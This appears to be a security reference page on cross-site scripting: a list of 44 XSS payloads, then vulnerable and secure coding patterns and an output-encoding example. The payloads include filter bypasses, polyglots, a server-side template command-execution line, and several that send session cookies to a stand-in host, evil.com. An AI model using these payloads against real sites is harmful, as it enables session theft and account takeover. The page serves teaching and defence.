SecurityInfinity
High severity • CWE-79 • 44 payloads

Cross-Site Scripting (XSS)

XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. These scripts can steal session tokens, redirect users to malicious sites, or perform actions on behalf of the victim.

85% of Web Apps Vulnerable
#3 in OWASP Top 10 2021
3 XSS Types
$$ Bug Bounty Value

XSS Payloads (44 payloads)

<script>alert('XSS')</script>
Basic script injection (Reflected XSS)

<script>alert(document.domain)</script>
Domain exfiltration (Reflected XSS)

<script>alert(document.cookie)</script>
Cookie stealing (Reflected XSS)

<img src=x onerror=alert('XSS')>
Image error handler (Reflected XSS)

<svg onload=alert('XSS')>
SVG onload event (Reflected XSS)

<body onload=alert('XSS')>
Body onload event (Reflected XSS)

<input onfocus=alert('XSS') autofocus>
Input autofocus (Reflected XSS)

<marquee onstart=alert('XSS')>
Marquee onstart (Reflected XSS)

<video><source onerror=alert('XSS')>
Video source error (Reflected XSS)

<details open ontoggle=alert('XSS')>
Details toggle event (Reflected XSS)
<script>fetch('https://evil.com?c='+document.cookie)</script>
Cookie exfiltration to external server (Stored XSS)

<img src=x onerror=new Image().src='https://evil.com?c='+document.cookie>
Cookie theft via image (Stored XSS)

<script>document.location='https://evil.com?c='+document.cookie</script>
Redirect with cookies (Stored XSS)

<iframe srcdoc='<script>alert(parent.document.domain)</script>'>
Iframe srcdoc injection (Stored XSS)

<script>var i=new Image();i.src='https://evil.com/log?'+document.cookie;</script>
Silent cookie logging (Stored XSS)
javascript:alert(document.domain)
JavaScript protocol handler (DOM-based XSS)

#<script>alert('XSS')</script>
Fragment identifier injection (DOM-based XSS)

'-alert(1)-'
DOM string breakout (DOM-based XSS)

\'-alert(1)//
Escaped string breakout (DOM-based XSS)

</script><script>alert('XSS')</script>
Script tag breakout (DOM-based XSS)

{{constructor.constructor('alert(1)')()}}
Angular expression (DOM-based XSS)

${alert(1)}
Template literal injection (DOM-based XSS)
<ScRiPt>alert('XSS')</ScRiPt>
Mixed case bypass (Filter Bypass)

<scr<script>ipt>alert('XSS')</scr</script>ipt>
Nested tag bypass (Filter Bypass)

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
HTML entity encoding (Filter Bypass)

<img src=x onerror=\u0061lert(1)>
Unicode escape (Filter Bypass)

<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
Base64 encoded payload (Filter Bypass)

<img src=x onerror=alert`1`>
Template literal function call (Filter Bypass)

<svg/onload=alert('XSS')>
Slash instead of space (Filter Bypass)

<svg onload=alert('XSS')>
Tab instead of space (Filter Bypass)

<img src=x onerror=alert&lpar;1&rpar;>
HTML entity parentheses (Filter Bypass)

<a href="javascript:alert(1)">click</a>
Anchor with JS protocol (Filter Bypass)

<img src=x onerror=window['alert'](1)>
Bracket notation (Filter Bypass)

<img src=x onerror=this['ale'+'rt'](1)>
String concatenation (Filter Bypass)

<<script>script>alert('XSS')</</script>script>
Double angle brackets (Filter Bypass)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Universal polyglot payload (Polyglot)

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
Multi-context polyglot (Polyglot)

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=alert()//>";
PortSwigger polyglot (Polyglot)
{{$on.constructor('alert(1)')()}}
AngularJS sandbox escape (Framework-Specific)

{{constructor.constructor('alert(1)')()}}
Vue.js template injection (Framework-Specific)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');
AngularJS 1.6+ bypass (Framework-Specific)

<div ng-app ng-csp><input ng-focus=$event.view.alert('XSS')>
Angular ng-focus with CSP (Framework-Specific)

[[${T(java.lang.Runtime).getRuntime().exec('calc')}]]
Thymeleaf SSTI (RCE) (Framework-Specific)

__proto__[innerHTML]=<img/src/onerror=alert(1)>
Prototype pollution to XSS (Framework-Specific)

Code Examples

Vulnerable patterns: untrusted input written directly into HTML

// JavaScript - DOM XSS: innerHTML parses the value as markup
document.getElementById('output').innerHTML = userInput;

// React - Dangerous HTML rendering bypasses JSX escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />

// PHP - Reflected XSS: query parameter echoed without encoding
echo "<p>Hello, " . $_GET['name'] . "</p>";

// Node.js/Express - query parameter interpolated into the response body
const express = require('express');
const app = express();
app.get('/search', (req, res) => {
    res.send(`<h1>Results for: ${req.query.q}</h1>`);
});

// Python/Flask - raw HTML string returned, so no template auto-escaping applies
from flask import Flask, request
app = Flask(__name__)

@app.route('/profile')
def profile():
    return f"<h1>Welcome, {request.args.get('name')}</h1>"

// Java/JSP - expression output is written unencoded
<%= request.getParameter("input") %>

// .NET Razor - Html.Raw disables the default encoding
@Html.Raw(Model.UserInput)

Secure patterns: encode or escape for the output context

// JavaScript - Use textContent instead
document.getElementById('output').textContent = userInput;

// React - JSX auto-escapes by default
<div>{userInput}</div>

// PHP - htmlspecialchars
echo "<p>Hello, " . htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8') . "</p>";

// Node.js - Use template engine with auto-escaping
// or use a library like DOMPurify when HTML input must be allowed
const clean = DOMPurify.sanitize(userInput);

// Python/Flask - Use Jinja2 auto-escaping (enabled by default)
{{ user_input }}  {# Auto-escaped #}

// Java - Use OWASP Java Encoder
<%= Encode.forHtml(request.getParameter("input")) %>

// .NET - Html.Encode (default in Razor)
@Model.UserInput  // Auto-escaped
@Html.Encode(Model.UserInput)  // Explicit
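The secure patterns above all encode for the HTML body, but a value that also lands inside a <script> block needs a different encoder, since the HTML parser does not decode entities there. The following is an added example, not code from this page or from SecurityInfinity, showing one encoder per context applied to several payloads from the list above as constructed test inputs.

```javascript
// Added example (not from the original page): one encoder per output context,
// exercised with sample inputs taken from the payload list above.

// HTML body / quoted attribute context: neutralise the five characters that
// can open a tag, close an attribute or start an entity.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript data context inside <script>: entities are not decoded here, so
// JSON-serialise, then escape what could end the block or break a line.
function encodeForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Render the untrusted value into both contexts of one page.
function renderPage(userInput) {
  return `<h1>Results for: ${encodeForHtml(userInput)}</h1>\n` +
    `<script>var q = ${encodeForScript(userInput)};</script>`;
}

// Constructed sample inputs, copied from the payload list on this page.
const SAMPLES = [
  "<script>alert('XSS')</script>",
  "<img src=x onerror=alert('XSS')>",
  "'-alert(1)-'",
  "\\'-alert(1)//",
  "</script><script>alert('XSS')</script>",
];

// For each sample: no raw tag or quote characters survive in the HTML
// context, the page still has exactly one </script>, and the JS context
// round-trips the original value losslessly.
function allSamplesNeutralised() {
  return SAMPLES.every((s) => {
    const page = renderPage(s);
    const jsValue = page.match(/var q = (.*);<\/script>$/)[1];
    return !/[<>"']/.test(encodeForHtml(s)) &&
      (page.match(/<\/script>/gi) || []).length === 1 &&
      JSON.parse(jsValue) === s;
  });
}
```

Calling `allSamplesNeutralised()` returns true; reusing `encodeForHtml` for the script context would instead leave literal `&#x27;` sequences in the data.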

Prevention Checklist

Resources

OWASP XSS Prevention Cheat Sheet
PortSwigger XSS Guide
Google XSS Game
XSS Hunter
Content Security Policy Guide
DOMPurify Library